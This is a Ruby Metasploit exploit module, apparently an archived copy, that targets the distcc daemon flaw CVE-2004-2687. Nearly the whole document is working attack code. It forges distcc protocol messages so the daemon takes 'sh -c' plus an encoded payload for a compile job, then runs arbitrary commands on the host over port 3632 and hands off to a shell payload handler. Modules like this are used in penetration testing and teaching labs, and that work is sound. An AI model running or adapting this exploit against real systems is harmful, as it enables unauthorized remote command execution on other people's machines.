DistCC Daemon Command Execution

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'DistCC Daemon Command Execution',  
'Description' => %q{  
This module uses a documented security weakness to execute  
arbitrary commands on any system running distccd.  
  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2004-2687'],  
[ 'OSVDB', '13378' ],  
[ 'URL', 'http://distcc.samba.org/security.html'],  
  
],  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD,   
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 1024,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl ruby bash telnet',  
}  
},  
'Targets' =>   
[  
[ 'Automatic Target', { }]  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(3632)  
], self.class)   
end  
  
def exploit  
connect  
  
distcmd = dist_cmd("sh", "-c", payload.encoded);  
sock.put(distcmd)  
  
dtag = rand_text_alphanumeric(10)  
sock.put("DOTI0000000A#{dtag}\n")  
  
res = sock.get_once(24, 5)  
  
if !(res and res.length == 24)  
print_status("The remote distccd did not reply to our request")  
disconnect  
return  
end  
  
# Check STDERR  
res = sock.get_once(4, 5)  
res = sock.get_once(8, 5)  
len = [res].pack("H*").unpack("N")[0]  
  
if (len > 0)  
res = sock.get_once(len, 5)  
res.split("\n").each do |line|  
print_status("stderr: #{line}")  
end  
end  
  
# Check STDOUT  
res = sock.get_once(4, 5)  
res = sock.get_once(8, 5)  
len = [res].pack("H*").unpack("N")[0]  
  
if (len > 0)  
res = sock.get_once(len, 5)  
res.split("\n").each do |line|  
print_status("stdout: #{line}")  
end  
end  
  
handler  
disconnect  
end  
  
  
# Generate a distccd command  
def dist_cmd(*args)  
  
# Convince distccd that this is a compile  
args.concat(%w{# -c main.c -o main.o})  
  
# Set distcc 'magic fairy dust' and argument count  
res = "DIST00000001" + sprintf("ARGC%.8x", args.length)  
  
# Set the command arguments  
args.each do |arg|  
res << sprintf("ARGV%.8x%s", arg.length, arg)  
end  
  
return res  
end  
  
end  
  
`